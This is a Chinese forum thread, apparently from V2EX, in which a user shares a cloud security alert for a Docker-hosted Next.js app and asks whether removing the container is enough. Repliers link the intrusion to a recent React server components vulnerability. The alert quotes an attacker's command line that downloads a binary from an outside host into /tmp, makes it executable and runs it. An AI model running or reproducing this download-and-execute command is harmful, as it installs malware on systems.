晚上收到阿里云告警可疑命令执行
告警原因
检测模型发现您的服务器上执行的进程命令行高度可疑,很有可能与木马、病毒、黑客行为有关。
用户名
www
命令行
/bin/sh -c wget -O /tmp/nginx3 http://res.qiqigece.top/nginx1;chmod 777 /tmp/nginx3;/tmp/nginx3
进程 ID
241050
父进程 ID
1061286
进程链
-[1061043] /usr/bin/containerd-shim-runc-v2 -namespace moby -id 5ae04de666d9af832833653883924afe2522ae749cf1635f8e16a086779c6dc4 -address /run/containerd/containerd.sock
-[1061069] node /usr/local/bin/pnpm start-docker
-[1061113] node /app/node_modules/.bin/../.pnpm/[email protected]/node_modules/npm-run-all/bin/npm-run-all/index.js check-db update-tracker set-routes-manifest start-server
-[1061275] node /usr/local/lib/node_modules/pnpm/bin/pnpm.cjs run start-server
-[1061286] next-server (v
微步检测:
https://s.threatbook.com/report/url/19a03bf704e725d1e64a84b8a245a043
我是在 docker 部署的,只移除 docker 安全吗?
 |
1
ysicing 16 小时 19 分钟前
最近不是说 nextjs 和 react 漏洞问题么。昨天披露的,今天就有好多 poc 了,我们今天就接到好多的入侵挂码的😂
|
|
2
ysicing 16 小时 5 分钟前
|
 |
4
abear 12 小时 10 分钟前
这玩意被入侵了,要重装系统吗 ^-^
|
 |
6
zerolover 3 小时 11 分钟前
umami 挺好用的,目前我们还是用官网的服务,主要是我们网站访问量没有太多。等后面再自己部署
|
 |
7
tabc2tgacd 1 小时 50 分钟前
react 的服务器组件漏洞
|
Select Language